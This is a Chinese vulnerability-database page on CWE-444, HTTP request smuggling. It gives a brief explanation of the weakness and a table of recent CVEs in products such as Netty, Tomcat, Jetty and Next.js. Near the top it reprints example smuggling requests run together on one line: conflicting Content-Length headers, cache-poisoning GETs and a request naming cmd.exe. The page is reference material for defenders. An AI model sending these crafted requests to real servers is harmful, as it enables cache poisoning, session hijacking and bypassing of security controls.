CWE-444 HTTP请求的解释不一致性(HTTP请求私运) 类弱点 174 条 CVE 漏洞汇总,含 AI 中文分析。
CWE-444指HTTP请求/响应走私漏洞,属于中间件解释不一致型缺陷。当代理或防火墙与后端服务器对畸形HTTP消息解析逻辑不同时,攻击者可利用此差异构造恶意请求,绕过安全控制或劫持用户会话。开发者应避免使用存在解析歧义的中间件,确保所有HTTP组件采用统一的解析标准,并严格校验请求边界,以消除解释不一致的风险。
POST http://www.website.com/foobar.html HTTP/1.1 Host: www.website.com Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Content-Length: 0 Content-Length: 54 GET /poison.html HTTP/1.1 Host: www.website.com Bla: GET http://www.website.com/page_to_poison.html HTTP/1.1 Host: www.website.com Connection: Keep-AliveGET /poison.html HTTP/1.1 Host: www.website.com Bla:POST /page.asp HTTP/1.1 Host: www.website.com Connection: Keep-Alive Content-Length: 49223 zzz...zzz ["z" x 49152] POST /page.asp HTTP/1.0 Connection: Keep-Alive Content-Length: 30 POST /page.asp HTTP/1.0 Bla: POST /page.asp?cmd.exe HTTP/1.0 Connection: Keep-Alive| CVE ID | 标题 | CVSS | 风险等级 | Published |
|---|---|---|---|---|
| CVE-2026-49753 | Mint HTTP/1客户端 响应走私漏洞 — mint | - | - | 2026-06-02 |
| CVE-2026-6324 | libsoup 安全漏洞 — Red Hat Enterprise Linux 10 | 4.8 | Medium | 2026-05-29 |
| CVE-2026-47676 | Hono 安全漏洞 — hono | 5.3 | Medium | 2026-05-28 |
| CVE-2026-48710 | Starlette 环境问题漏洞 — starlette | 6.5 | Medium | 2026-05-26 |
| CVE-2026-8620 | IBM Web Server Plug-ins for IBM WebSphere Application Server and IBM WebSphere Liberty 环境问题漏洞 — Web Server Plug-ins for WebSphere Application Server and WebSphere Liberty | 7.5 | High | 2026-05-26 |
| CVE-2026-42585 | Netty 环境问题漏洞 — netty | 6.5 | Medium | 2026-05-13 |
| CVE-2026-42584 | Netty 环境问题漏洞 — netty | 7.3 | High | 2026-05-13 |
| CVE-2026-42580 | Netty 输入验证错误漏洞 — netty | 6.5 | Medium | 2026-05-13 |
| CVE-2026-42581 | Netty 环境问题漏洞 — netty | 5.8 | Medium | 2026-05-13 |
| CVE-2026-40562 | Gazelle 环境问题漏洞 — Gazelle | 7.5AI | HighAI | 2026-05-06 |
| CVE-2026-40561 | Starlet 环境问题漏洞 — Starlet | 7.5 | - | 2026-05-03 |
| CVE-2026-39805 | Bandit 环境问题漏洞 — bandit | 9.1 | - | 2026-05-01 |
| CVE-2026-40560 | Starman 环境问题漏洞 — Starman | 7.5AI | HighAI | 2026-04-28 |
| CVE-2026-41873 | Apache Pony Mail 环境问题漏洞 — Pony Mail | 9.8AI | CriticalAI | 2026-04-28 |
| CVE-2026-2708 | libsoup 环境问题漏洞 — Red Hat Enterprise Linux 10 | 3.7 | Low | 2026-04-23 |
| CVE-2025-31958 | HCL BigFix Service Management 安全漏洞 — BigFix Service Management (SM) | 3.7 | Low | 2026-04-21 |
| CVE-2026-2332 | Eclipse Jetty 环境问题漏洞 — Eclipse Jetty | 7.4 | High | 2026-04-14 |
| CVE-2026-24880 | Apache Tomcat 环境问题漏洞 — Apache Tomcat | 9.1AI | CriticalAI | 2026-04-09 |
| CVE-2026-31842 | Tinyproxy 安全漏洞 — Tinyproxy | 7.5 | High | 2026-04-07 |
| CVE-2025-65114 | Apache Traffic Server 安全漏洞 — Apache Traffic Server | 7.5AI | HighAI | 2026-04-02 |
| CVE-2026-1491 | IBM多款产品 环境问题漏洞 — Verify Identity Access Container | 5.3 | Medium | 2026-04-01 |
| CVE-2026-2862 | IBM Verify Identity Access Container和IBM Verify Identity Access 环境问题漏洞 — Verify Identity Access Container | 5.3 | Medium | 2026-04-01 |
| CVE-2026-34441 | cpp-httplib 环境问题漏洞 — cpp-httplib | 4.8 | Medium | 2026-03-31 |
| CVE-2026-33870 | Netty 环境问题漏洞 — netty | 7.5 | High | 2026-03-27 |
| CVE-2026-28369 | Undertow 环境问题漏洞 — Red Hat build of Apache Camel for Spring Boot 4 | 8.7 | High | 2026-03-27 |
| CVE-2026-28367 | Undertow 环境问题漏洞 — Red Hat build of Apache Camel for Spring Boot 4 | 8.7 | High | 2026-03-27 |
| CVE-2026-28368 | Undertow 环境问题漏洞 — Red Hat build of Apache Camel for Spring Boot 4 | 8.7 | High | 2026-03-27 |
| CVE-2026-4742 | LiteIDE 安全漏洞 — liteide | 6.5 | - | 2026-03-24 |
| CVE-2026-29057 | Next.js 环境问题漏洞 — next.js | 9.1 | - | 2026-03-18 |
| CVE-2026-23941 | Erlang/OTP 安全漏洞 — OTP | 8.2 | - | 2026-03-13 |
CWE-444(HTTP请求的解释不一致性(HTTP请求私运)) 是常见的弱点类别,本平台收录该类弱点关联的 174 条 CVE 漏洞。